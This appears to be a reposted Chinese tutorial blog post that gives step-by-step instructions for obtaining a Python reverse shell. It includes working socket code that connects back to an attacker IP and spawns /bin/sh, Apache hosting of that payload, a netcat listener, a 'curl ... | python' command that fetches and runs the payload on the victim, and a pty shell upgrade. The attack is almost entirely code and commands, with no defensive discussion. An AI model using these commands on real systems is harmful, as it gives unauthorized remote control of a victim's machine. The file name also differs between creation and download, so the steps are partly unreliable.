标签：www shell socket python apache2 ## 反弹

用python反弹shell

攻击机：linux（本文章使用ubuntu）

受害主机：安装了python的windows或者linux（本文章受害主机为kali linux）

1.配置环境：windows安装python , python官网地址: www.python.org ;linux:sudo apt-get install python3

2.攻击机开启http服务，apt install -y apache2   ##本次实验用apache

vi /etc/apache2/sites-enabled/000-default.conf  ## 编辑此文件，修改一下配置

               <VirtualHost *:80>  ## 其他行不变

               DocumentRoot /var/www/html   ## 浏览器访问目录

rm /var/www/html/index.html   ##删除自带主页

/etc/init.d/apache2 restart  ## 重启apache服务

service apache2 status  ## 查看apache2状态，应为active(running)状态

 

 

 3.cd /var/www/html  ## 切换到/var/www/html目录下

 touch reverse_python_shell.py  ## 创建文件

 vi reverse_python_shell.py ## 编辑文件

##.py文件内容

import socket,subprocess,os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(("192.168.106.139",9999)) #更改IP为自己的外网IP,端口自定义

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1)

os.dup2(s.fileno(),2)

p=subprocess.call(["/bin/sh","-i"])

*编辑完后按Esc，再按:，输入wq，按回车

4.攻击机要安装netcat，输入以下命令：

sudo apt-get -y install netcat-traditional

sudo update-alternatives --config nc

nc -lvvp 9999 ## 对9999端口进行监听

5.在受害机上召唤出cmd，输入:curl 192.168.106.139/reverse_py_shell.py | python  ## 将文件导入python进行执行

 

 

 

6.反连成功，以下为攻击机终端界面

 

*python -c ‘import pty;pty.spawn(“/bin/bash”)’    ## 因为已知目标主机安装了python，所以可以引入pty终端库，派生出bash ##bash是linux shell的一种，在bash中可以更方便的进行命令输入

 

 

 

标签：www,shell,socket,python,apache2,##,反弹
来源： https://www.cnblogs.com/mel0n/p/16663823.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。